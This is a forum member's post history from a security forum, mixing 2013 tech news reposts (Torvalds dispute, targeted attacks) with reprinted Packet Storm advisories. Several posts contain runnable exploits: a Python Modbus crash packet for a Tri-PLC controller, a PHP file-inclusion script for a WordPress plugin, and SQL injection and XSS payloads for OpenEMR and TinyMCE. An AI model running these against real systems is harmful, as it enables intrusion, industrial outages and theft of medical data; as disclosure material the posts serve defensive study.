Jump to content

Matt

Active Members
  • Posts

    1773
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by Matt

  1. $$$
  2. A Linux developer has blasted the kernel's chief Linus Torvalds, taking him to task for his famous potty mouth and brutal putdowns of his lieutenants. It's time for Torvalds to stop "verbally abusing" his programmers, Sarah Sharp told the fiery Finn, warning him she’s "not taking it any more". The USB 3.0 driver maintainer pleaded: "You don't need to SHOUT, call me names, or tell me to SHUT THE FUCK UP!" But Torvalds, who founded the popular Linux kernel project in the mid-1990s, wasn't taking this lying down, claiming today's demands of "professionalism" promote passive-aggressive "fake politeness" used by tie-wearing back-stabbers. “You are in a position of power. Stop verbally abusing your developers,” Sharp hit back at Torvalds on the Linux Kernel Mailing List (LKML) - the nerve-centre of the open-source system's development. The catalyst was Torvalds' latest rants over bugs in the x86 updates for the 3.11 kernel that has just hit first release candidate as well as in the 3.10.1 stable review. Things started simmering on Friday, when Torvalds tore into Sharp’s kernel boss, USB subsystem maintainer Greg Kroah-Hartman. Torvalds wrote that bugs were getting into the kernel because devs treat Kroah-Hartman like a doormat. “You may need to learn to shout at people,” he wrote. However, this was playful by Torvalds’ standards, and by Saturday Linus had uncorked the vintage Torvalds over problems he’d found in the x86 work on 3.11. Torvalds was very upset after he'd merged the code assuming it was stable when it wasn’t. Sharp, who runs USB 3.0 support and is the Linux kernel xHCI driver maintainer, has demanded Torvalds stop yelling at devs in caps and be "more professional". Sharp wrote : Sharp has called for talks at the next Linux Kernel Summit to improve the working environment on the kernel and to force Torvalds to confront people in person. “We can at least yell at each other in person,” Sharp wrote. The kernel dev is also encouraging fellow devs to stand up to Torvalds and call for civility on the LKML. I'm not going to wear ties, buy into fake politeness - Torvalds But the angry Finn isn't backing down and Torvalds hasn't taken criticism of his management style in silence. In an increasingly lengthy and fiery series of LKML exchanges with Sharp, he fired back arguing he can’t help himself and it’s his management style to be "honest" and "emotional". Torvalds responded to Sharp’s calls for greater professionalism by saying she’s trying to be force her own style on him. She reckoned he should running the project by setting rules on code quality and working with other managers to discipline devs who submit the kinds of bugs that typically send him off into orbit. “If they protest, then lay into them,” she said. But, no, that’s not Torvalds’ style. “I'm not going to start wearing ties, I'm *also* not going to buy into the fake politeness, the lying, the office politics and backstabbing, the passive aggressiveness, and the buzzwords. Because THAT is what 'acting professionally' results in,” he said. Indeed, Torvalds reckons, "publicly tearing apart" members of the Linux project is the only way to get results. Sharp headed this off, saying Torvalds is capable of being polite – he just doesn’t want to bother. On Monday, as part of her back and forth with Torvalds, Sharp wrote : Sursa TheRegister.co.uk
  3. A TARGETED ATTACK launched against European government agencies has been uncovered by security company Trend Micro, which warned of its ability to steal login credentials from Internet Explorer (IE) and Microsoft Outlook. The attack takes advantage of a vulnerability in Microsoft Office and was launched in the form of an email claiming to be from the Chinese Ministry of National Defense, although Trend Micro said it appeared to have been sent from a Gmail account and did not use a Chinese name. The email contained a malicious Microsoft Word attachment that exploits vulnerability CVE-2012-0158 in all versions of Microsoft Office 2003 to Microsoft Office 2010, despite having been patched by Microsoft over a year ago. "The exploit is used to drop a backdoor onto the system, which steals login credentials for websites and email accounts from Internet Explorer and Microsoft Outlook," Trend Micro's Jonathan Leopando said in a blog post on Monday. "It also opens a legitimate 'dummy' document, to make the target believe that nothing malicious happened. "Any stolen information is then uploaded to two IP addresses, both of which are located in Hong Kong." The security firm said that the attack was aimed at personnel working for both European and Asian governments, and was sent to at least 16 officials representing European countries. The attackers made it more likely that the document would be opened by the targets by ensuring the topic of the email would be of interest to them. "In addition, the information stolen and where it was stolen from - is very consistent with targeted attacks aimed at large organizations that use corporate mainstays like Internet Explorer and Outlook," Trend Micro added. Though the email claims to be from Chinese Ministry of National Defense, it was found that Chinese media organisations were also targeted in the attack, so it is unclear where the attack actually came from. Trend Micro said that its products already detect all aspects of this threat, with the message and C&C servers being blocked, and the malicious attachment detected as TROJ_DROPPER.IK and the backdoor itself as BKDR_HGDER.IK. Sursa TheInquirer.net
  4. South Korea has accused the North Korean government of being behind a wave of cyber attacks on the country's networks. The Ministry of Science, ICT and Future Planning reported uncovering evidence linking the North Korean government to the signature malicious computer codes and an internet address used in the attacks mounted on the anniversary of the Korean War last month, in a report published Tuesday. The campaign saw hackers target several government websites with denial of service (DoS) and defacement attacks. The attackers claimed to be operating as independent hacktivists, though this has been questioned. Most recently security firm McAfee reported uncovering evidence suggesting that the attacks are part of a larger, sophisticated spying campaign that has been active since at least 2009, in its Dissecting Operation Troy: Cyber espionage in South Korea threat report. Like the Ministry, the report cited similarities between the DarkSeoul attacks and malware used by a second team, operating under the New Romanic Cyber Army Team alias as proof the use of the Anonymous hacktivist banner was likely a smokescreen designed to fool law enforcement and governments about the true nature of the campaign. However, unlike the Ministry, McAfee said even with this evidence it is still too early to know whether the North Korean government is behind the attacks. Prior to the attacks on the government, DarkSeoul hackers also mounted sophisticated cyber attacks on several of the country's banks and broadcasters, crippling thousands of computers. This has increased political tensions between the North and South Korean governments, leading many security researchers to fear potential repercussions. Sursa TheRegister.co.uk
  5. 4. Unele categorii au regulament intern. Verific? dac? exist? un regulament sticky înainte de a posta într-o anumite categorie. În special categoriile "CERERI"(minim 10 posturi de CALITATE), "AJUTOR"(minim 10 posturi de CALITATE) sau "Bloguri ?i Bloggeri"(minim 50 posturi CALITATE). Respectati aceasta regula !!
  6. Topic-ul ala e plin de spam si posturi de cacat si care sunt inutile.Mi se pare normal sa va dea warn. Ati plecat de la un xss si ati ajuns la Mantuire.
  7. Description : Tri-PLC Nano-10 r81 suffers from a denial of service vulnerability. Author : Sapling Source : Tri-PLC Nano-10 r81 Denial Of Service ? Packet Storm Code : # Exploit Title: Tri-PLC Nano-10 DoS # Date: 07/11/2013 # Exploit Author: Sapling # Vendor Homepage: www.tri-plc.com # Version: Firmware Version r81 and prior # CVE : CVE-2013-2784 # ICSA: ICSA-13-189-02 /* The vulnerability exists due to a flaw in the PLC's ability to handle a Modbus packet with the bit quantity of coils set to 0. When sending this malformed packet the device crashes and fails to recover without manual intervention. Once an engineer manually reboots the device it will recover from the crash. In order to minimize the risk of this attack the Modbus access control list can be used to limit the ip addresses that can connect to the device. Additionally, limiting this device to segmented internal networks is advised and blocking port TCP 502 at the gateway. Note: I believe the device is also vulnerable to the same vulnerability when executing write's as well but as most write functions are going to be limited on devices or at least more so than reads would be. Finally, I take no responsibility for the how or where you use this proof of concept code and remind you to be responsible. */ # Python proof of concept # For those more interested in the value meanings: # Starting form the \x06 bit and down being the more important pieces # \x06 length # \x01 unit id # \x01 function code (read coils) # \x00\x00 start address # \x00\x00 coil quantity import sys import socket new = socket.socket(socket.AF_INET, socket.SOCK_STREAM) new.connect(('192.168.1.12', 502)) #Change the IP address to your PLC IP Address new.send('\x00\x01\x00\x00\x00\x06\x01\x01\x00\x00\x00\x00')
  8. Description : WordPress Spicy Blogroll plugin suffers from a local file inclusion vulnerability. Author : Ahlspiess Source : WordPress Spicy Blogroll Local File Inclusion ? Packet Storm Code : <?php // Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability // Date: 12-07-2013 (GMT+8 Kuala Lumpur) // Author: Ahlspiess // Greetz: All TBDIAN - http://w3.tbd.my // Screenshot: http://i.imgur.com/jIrUznC.png /** Details: File: /wp-content/plugins/spicy-blogroll-ajax.php SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php <?php ... ... $link_url = $_GET['link_url']; $link_text = $_GET['link_text']; $var2 = unscramble($_GET['var2']); $var3 = unscramble($_GET['var3']); $var4 = unscramble($_GET['var4']); $var5 = unscramble($_GET['var5']); $nonce = unscramble($_GET['var11']); require_once($var2.$var4); <-- Boom ... ... */ if(!isset($argv[3])) { die(sprintf("php %s <host> <path> <file>\n", $argv[0])); } list(,$host, $path, $file) = $argv; $vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s'; $request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file))); $opts = array( 'http'=>array( 'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0", 'ignore_errors' => true, ) ); $context = stream_context_create($opts); echo file_get_contents($request, 0, $context); /** Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php Line: 386-401 */ function scramble($text1,$rng = 1){ $len=strlen($text1); $rn=$rng%2; $count=7; $seed=($rn%=2)+1; $text2=chr($seed+64+$rng).chr($rng+70); for($i=0; $i<=$len-1; $i++) { $seed*=-1; $count+=1; $ch=ord(substr($text1,$i,1))+$seed; if($ch==92){$ch.=42;} $text2.=chr($ch); if($count%5==$rn){$text2.=chr(mt_rand(97,123));} } return $text2; } ?>
  9. Description : OpenEMR versions 4.1.1 patch-12 and below suffer from cross site scripting and remote SQL injection vulnerabilities. Author : Nate Drier Source : OpenEMR 4.1.1 patch-12 Cross Site Scripting / SQL Injection ? Packet Storm Code : Trustwave SpiderLabs Security Advisory TWSL2013-018: Multiple Vulnerabilities in OpenEMR Published: 07/12/13 Version: 1.0 Vendor: OEMR (www.open-emr.org) Product: OpenEMR Version affected: 4.1.1 patch-12 and prior Product description: OpenEMR is an ONC-ATB Ambulatory EHR 2011-2012 certified electronic health records and medical practice management application. It features fully integrated electronic health, records, practice management, scheduling, electronic billing. Finding 1: SQL Injection *****Credit: Nate Drier of Trustwave SpiderLabs CVE: CVE-2013-4619 CWE: CWE-89 Several locations in the authenticated portion of OpenEMR do not properly sanitize input. As any user (from Administrator to Front Desk), SQL statements can be injected into the application in the following locations: 1. Reports > Visits > SuperBill > Dates ('start' and 'end' parameters are vulnerable with a POST to /openemr-4.1.1/interface/reports/custom_report_range.php) #Request POST http://a.b.c.d/openemr-4.1.1/interface/reports/custom_report_range.php HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive Referer: http://a.b.c.d/openemr-4.1.1/interface/reports/custom_report_range.php Content-Type: application/x-www-form-urlencoded Content-Length: 52 form_refresh=true&start=2013-01-07&end=2013-02-06'INJECT #Response <snip> <p><p><font color='red'>ERROR:</font> query failed: select * from forms where form_name = 'New Patient Encounter' and date between '2013-01-07' and '2013-02'-06' order by date DESC<p>Error: <font color='red'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by date DESC' at line 1</font><p> <snip> 2. Misc > Chart Tracker ('form_newid' parameter is vulnerable with a POST to /openemr-4.1.1/custom/chart_tracker.php) #Request POST http://a.b.c.d/openemr-4.1.1/custom/chart_tracker.php HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive Referer: http://a.b.c.d/openemr-4.1.1/custom/chart_tracker.php Content-Type: application/x-www-form-urlencoded Content-Length: 34 form_newid=test'INJECT&form_lookup=Look+Up #Response <snip> <p><p><font color='red'>ERROR:</font> query failed: SELECT pd.pid, pd.pubpid, pd.fname, pd.mname, pd.lname, pd.ss, pd.DOB, ct.ct_userid, ct.ct_location, ct.ct_when FROM patient_data AS pd LEFT OUTER JOIN chart_tracker AS ct ON ct.ct_pid = pd.pid WHERE pd.pubpid = 'test'INJECT' ORDER BY pd.pid ASC, ct.ct_when DESC LIMIT 1<p> <snip> Finding 2: HTML / Script Injection (Persistant XSS) *****Credit: Nate Drier of Trustwave SpiderLabs CVE: CVE-2013-4620 CWE: CWE-79 The 'Office Notes' section of OpenEMR allows users of the application to submit notes for other users. This input is not sanitized, and HTML can be injected into the notes application and saved. Basic XSS works (alerts, document.cookie, etc). Useful in a pentest, UNC paths can also be saved as a note, and any user viewing the notes will attempt to authenticate to the UNC share location. 1. Misc > Office Notes ('note' parameter is vulnerable with a POST to /openemr-4.1.1/interface/main/onotes/office_comments_full.php) #Request: POST http://a.b.c.d/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive Referer: http://a.b.c.d/openemr-4.1.1/interface/main/onotes/office_comments_full.php Content-Type: application/x-www-form-urlencoded Content-Length: 43 mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script> #Response: <snip> <tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115' onClick='javascript:document.update_activity.act115.value=this.checked' type=checkbox checked></td><td><label for='box115' class='bold'>Wed February 06th</label> <label for='box115' class='bold'>(test)</label></td><td><label for='box115' class='text'><script>alert(document.cookie)</script> </label></td></tr> <snip> Remediation Steps: The vendor has released the 4.1.1 patch to addresses these vulnerabilities. All versions need to be upgraded to version 4.1.1 in order to apply the patch. Revision History: 06/03/13 - Vulnerability disclosed 06/14/13 - Patch released by vendor 07/12/13 - Advisory published References 1. http://www.open-emr.org/wiki/index.php/OpenEMR_Patches About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
  10. Description : TinyMCE Image Manager versions 1.1 and below suffer from a cross site scripting and content spoofing vulnerabilities. Author : MustLive Source : TinyMCE Image Manager 1.1 Cross Site Scripting ? Packet Storm Code : Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE. ------------------------- Affected products: ------------------------- Vulnerable are TinyMCE Image Manager 1.1 and previous versions. ------------------------- Affected vendors: ------------------------- Dustweb http://dustweb.ru/projects/tinymce_images/ ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Content Spoofing (WASC-12): http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif ------------ Timeline: ------------ 2013.05.18 - announced at my site. 2013.05.18 - informed developer. 2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua
  11. Description : Dell.com suffers from an open redirection vulnerability. Author : GoMeR-12 Source : Dell.com Open Redirection ? Packet Storm Code : [#] Title: Dell Open URL Redirection Vulnerability [#] Status: Unfixed [#] Severity: High [#] Works on: Any browser with any version [#] Homepage: www.Dell.com [#] Author: GoMeR-12 [#] Email: gomer12@gmail.com Description: I have found Open URL Redirection Vulnerabilities in DEll 'sdialogs . ThisVulnerability is exploitable to all users Using "RouteTo" Parameter: http://www.dell.com/support/contents/us/en/19/RouteTo?SourceUrl=http://google.co.il
  12. Description : Zoho suffers from information disclosure due to a lack of a content-type being specified and also appears to use mixed content. Author : Juan Carlos Garcia Source : Zoho Information Disclosure / Mixed Content ? Packet Storm Code : ZOHO INTERNAL INFORMATION DISCLOSURE Content type is not specified /INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM ================================================================================================================================================== Report-Timeline: ================ 2013-07-01: Researcher Notification 2013-07-02: RESPONSE 2013-07-05: Ask About the issues 2013-07-06: Vendor Feedback 2013-07-10: Not Fixed 2013-07-12: Full Disclosure I-VULNERABILITIES ====================== #Title:ZOHO INTERNAL INFORMATION DISCLOSURE -Content type is not specified / INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM #Vendor:httpS://www.zoho.com #Author:Juan Carlos García (@secnight) #Follow me http://www.highsec.es http://hackingmadrid.blogspot.com Twitter:@secnight II-Introduction: ====================== 1-To date, Zoho.com has launched 25+ online applications — from CRM to Mail, Office Suite, Project Management, Invoicing, Web conferencing and more. Zoho has received numerous awards, including an InfoWorld 2009 "Product of the Year" award, a 2008 PC World "25 Most Innovative Products Award" and a 2007 TechCrunch "Best Enterprise Start-up." Zoho uses an open application programming interface for its Writer, Sheet, Show, Creator, Meeting, and Planner products. It also has plugins into Microsoft Word and Excel, an OpenOffice.org plugin, and a plugin for Firefox. More than 8 Million users Work Online with Zoho 2-Components 2.1 Zoho Writer 2.2 Zoho Sheet 2.3 Zoho Reports 2.4 Zoho Show 2.5 Zoho Projects 2.6 Zoho BugTracker 2.7 Zoho CRM 2.8 Zoho Invoice 2.9 Zoho Creator 2.10 Zoho Wiki 2.11 Zoho Discussions 2.12 Zoho Planner 2.13 Zoho Notebook 2.14 Zoho Chat 2.15 Zoho Mail 2.16 Zoho Meeting 2.17 Zoho People 2.18 Zoho Books 2.19 Zoho Docs III-PROOF OF CONCEPT ====================== INTERNAL INFORMATION DISCLOSURE -Content type is not specified- ============================================================== This page doesn't set a Content-Type header value. This value informs the browser what kind of data to expect. If this header is missing, the browser may incorrectly handle the data. This could lead to security problems. This vulnerability affects /creator/help/images/contacts.ds. /* * Author : latha * Generated on : 02-Nov-2012 14:53:52 * Version : 3.0 */ application "Contacts" { allow html = true date format = "dd-MMMM-yyyy" time zone = "America/Los_Angeles" section Home { form Contacts_Form { displayname = "Contacts Form" captcha = true success message = "Data Added Successfully!" field alignment = left column { EmpName ( type = text tooltip = "Web application" width = 200px ) Number_1 ( displayname = "Number 1" type = number maxchar = 2 width = 100px ) Email_ID ( displayname = "Email ID" type = email tooltip = "Web application" width = 200px ) Contact ( type = decimal maxchar = 99 tooltip = "Web application" width = 100px ) DOB ( type = date tooltip = "Web application" width = 130px ) Country ( type = text tooltip = "Web application" width = 200px ) } column { Currency_1 ( displayname = "Currency 1" type = USD maxchar = 2 width = 100px ) } actions { on add { Submit ( type = submit displayname = "Submit" ) Reset ( type = reset displayname = "Reset" ) } on edit { Update ( type = submit displayname = "Update" ) Cancel ( type = cancel displayname = "Cancel" ) } } } list Contacts_Form_View { displayname = "Contacts Form View" show all rows from Contacts_Form ( EmpName as "Name" Email_ID as "Email ID" Contact, display total DOB Country Number_1 as "Number 1" Currency_1 as "Currency 1" ) filters ( DOB ) } } } creator/help/images/ical-feed1.ds. BEGIN:VCALENDAR PRODID:-//ZOHO Creator//iCal Feed//EN VERSION:2.0 CALSCALE:GREGORIAN X-WR-TIMEZONE:UTC X-WR-CALNAME:ICal_View BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:My B`day DTEND;VALUE=DATE:20120417 ORGANIZER;CN=Test 2: LOCATION:Chennai STATUS:confirmed DTSTART;VALUE=DATE:20120417 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000002226173/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Meet test DTEND;VALUE=DATE:20120218 ORGANIZER;CN=Test 1: LOCATION:Chennai STATUS:confirmed DTSTART;VALUE=DATE:20120215 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000002226169/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Rozden Den DTEND:20100429T055909 ORGANIZER;CN=Tatka: LOCATION:Aprilovo STATUS:confirmed DTSTART:20100428T205905 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000001243011/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Summ DTEND;VALUE=DATE:20100426 ORGANIZER;CN=Hristo: LOCATION:Btv STATUS:tentative DTSTART;VALUE=DATE:20100426 CLASS:PRIVATE UID:1040582/ical-application/ICal_View/204098000001243007/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:No summary DTEND:20100426T144354 ORGANIZER;CN=Stefan Stoychev: LOCATION:Here STATUS:tentative DTSTART:20100425T204350 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000001243003/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Week end trip DTEND;VALUE=DATE:20090921 ORGANIZER;CN=Stephen: LOCATION:New york STATUS:confirmed DTSTART;VALUE=DATE:20090919 CLASS:PRIVATE UID:1040582/ical-application/ICal_View/204098000000601326/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Public sector meeting DTEND:20090910T143000 ORGANIZER;CN=John: LOCATION:US STATUS:confirmed DTSTART:20090910T113000 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000000601322/@zohocreator.com END:VEVENT END:VCALENDAR /creator/help2/images/ical-feed1.ds. BEGIN:VCALENDAR PRODID:-//ZOHO Creator//iCal Feed//EN VERSION:2.0 CALSCALE:GREGORIAN X-WR-TIMEZONE:UTC X-WR-CALNAME:ICal_View BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:My B`day DTEND;VALUE=DATE:20120417 ORGANIZER;CN=Test 2: LOCATION:Chennai STATUS:confirmed DTSTART;VALUE=DATE:20120417 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000002226173/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Meet test DTEND;VALUE=DATE:20120218 ORGANIZER;CN=Test 1: LOCATION:Chennai STATUS:confirmed DTSTART;VALUE=DATE:20120215 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000002226169/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Rozden Den DTEND:20100429T055909 ORGANIZER;CN=Tatka: LOCATION:Aprilovo STATUS:confirmed DTSTART:20100428T205905 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000001243011/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Summ DTEND;VALUE=DATE:20100426 ORGANIZER;CN=Hristo: LOCATION:Btv STATUS:tentative DTSTART;VALUE=DATE:20100426 CLASS:PRIVATE UID:1040582/ical-application/ICal_View/204098000001243007/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:No summary DTEND:20100426T144354 ORGANIZER;CN=Stefan Stoychev: LOCATION:Here STATUS:tentative DTSTART:20100425T204350 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000001243003/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Week end trip DTEND;VALUE=DATE:20090921 ORGANIZER;CN=Stephen: LOCATION:New york STATUS:confirmed DTSTART;VALUE=DATE:20090919 CLASS:PRIVATE UID:1040582/ical-application/ICal_View/204098000000601326/@zohocreator.com END:VEVENT BEGIN:VEVENT DTSTAMP:20121121T115822Z SUMMARY:Public sector meeting DTEND:20090910T143000 ORGANIZER;CN=John: LOCATION:US STATUS:confirmed DTSTART:20090910T113000 CLASS:PUBLIC UID:1040582/ical-application/ICal_View/204098000000601322/@zohocreator.com END:VEVENT END:VCALENDAR /creator/help2/images/contacts.ds. * * Author : latha * Generated on : 02-Nov-2012 14:53:52 * Version : 3.0 */ application "Contacts" { allow html = true date format = "dd-MMMM-yyyy" time zone = "America/Los_Angeles" section Home { form Contacts_Form { displayname = "Contacts Form" captcha = true success message = "Data Added Successfully!" field alignment = left column { EmpName ( type = text tooltip = "Web application" width = 200px ) Number_1 ( displayname = "Number 1" type = number maxchar = 2 width = 100px ) Email_ID ( displayname = "Email ID" type = email tooltip = "Web application" width = 200px ) Contact ( type = decimal maxchar = 99 tooltip = "Web application" width = 100px ) DOB ( type = date tooltip = "Web application" width = 130px ) Country ( type = text tooltip = "Web application" width = 200px ) } column { Currency_1 ( displayname = "Currency 1" type = USD maxchar = 2 width = 100px ) } actions { on add { Submit ( type = submit displayname = "Submit" ) Reset ( type = reset displayname = "Reset" ) } on edit { Update ( type = submit displayname = "Update" ) Cancel ( type = cancel displayname = "Cancel" ) } } } list Contacts_Form_View { displayname = "Contacts Form View" show all rows from Contacts_Form ( EmpName as "Name" Email_ID as "Email ID" Contact, display total DOB Country Number_1 as "Number 1" Currency_1 as "Currency 1" ) filters ( DOB ) } } INSECURE TRANSITION FROM HTTP TO HTTPS IN FORM ================================================ This form is served from an insecure page (http) page. This page could be hijacked using a Man-in-the-middle attack and an attacker can replace the form target. (Too Many Affected Items ... ) Examples: /announcements/blog/2009-webware-100-awards-vote-for-zoho.html /announcements/blog/add-footnotes-endnotes-to-your-zoho-writer-documents.html /announcements/blog/adventnet-inc-is-now-zoho-corporation.html /announcements/blog/a-faster-way-to-file-bugs-in-bugtracker.html /announcements/blog/a-million-toons-at-toondoo.html /announcements/blog/annnouncing-zoho-business.html /announcements/blog/announcement-zoho-forums-migration.html /announcements/blog/announcing-the-do-it-yourself-dabble-db-migration-tool.html /announcements/blog/announcing-zoho-discussions.html /announcements/blog/announcing-zoholics-zoho-user-conference.html /announcements/blog/announcing-zoho-meeting.html /announcements/blog/announcing-zoho-notebook.html /announcements/blog/announcing-zoho-pulse-a-private-social-network-for-your-business.html /announcements/blog/announcing-zoho-show-20.html /announcements/blog/announcing-zoho-support-web-based-help-desk-software-ticket-management-and-self-service-portal.html /announcements/blog/announcing-zoho-survey-easily-create-professional-surveys-collect-data-and-make-smarter-decisions.html /announcements/blog/automatic-payment-reminders-for-invoices.html /announcements/blog/baihui-distributes-zoho-apps-in-china.html /announcements/blog/barcamp-at-chennai.html /announcements/blog/berryforms-esurvey-integrates-zoho-reports.html /announcements/blog/better-import-and-embed-options-in-zoho-show.html /announcements/blog/boxnet-integrates-zoho.html /announcements/blog/bug-tracking.html /announcements/blog/case-study-how-zoho-reports-helps-optimize-globos-tv-programming.html /announcements/blog/cloudave-launches-focusing-on-business-apps-on-the-cloud.html /announcements/blog/copy-database-html-import-intelligent-chart-creation-and-themes-support-in-zoho-db-reports.html /announcements/blog/create-zoho-creator-web-apps-from-microsoft-access-database.html /announcements/blog/dabble-db-customers-migration-offer-from-zoho-creator.html /announcements/blog/demo-account-in-zoho-writer-removed.html /announcements/blog/discontinuing-support-for-ie6-in-zoho-applications-and-browser-share-for-saas-apps-is-different.html /announcements/blog/eating-ones-own-dog-food.html /announcements/blog/facebook-connect.html /announcements/blog/format-your-columns-as-you-like-in-zoho-db-reports.html /announcements/blog/general/general/general/page/2 /announcements/blog/general/general/general/page/3 /announcements/blog/general/general/page/10 /announcements/blog/general/general/page/11 /announcements/blog/general/general/page/12 /announcements/blog/general/general/page/13 IV. CREDITS ------------------------- This vulnerabilities has been discovered by Juan Carlos García(@secnight) V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.
  13. Description : Huawei E587 3G Mobile Hotspot version 11.203.27 is prone to a command injection vulnerability in the Web UI. Successful exploitation allows unauthenticated attackers to execute arbitrary commands with root privileges. Author : Frederic Basse Source : Huawei E587 3G Mobile Hotspot Command Injection ? Packet Storm Code : -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [CVE-2013-2612] Huawei E587 3G Mobile Hotspot Command Injection ________________________________________________________________________ Summary: Huawei E587 3G Mobile Hotspot, version 11.203.27, is prone to a command injection vulnerability in the Web UI. Successful exploitation allows unauthenticated attackers to execute arbitrary commands with root privileges. ________________________________________________________________________ Details: The HTTP endpoint "/api/device/time" in Web UI is vulnerable to shell command injection. This allows code execution with root privileges. ________________________________________________________________________ CVSS Version 2 Metrics: Access Vector: Network exploitable Access Complexity: Low Authentication: Not required to exploit Confidentiality Impact: Complete Integrity Impact: Complete Availability Impact: Complete ________________________________________________________________________ Disclosure Timeline: 2013-03-18 Vendor notified 2013-03-18 CVE-2013-2612 assigned 2013-07-15 Public advisory ________________________________________________________________________ References: http://www.huawei.com/en/security/psirt/ ________________________________________________________________________ Frédéric Basse -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ 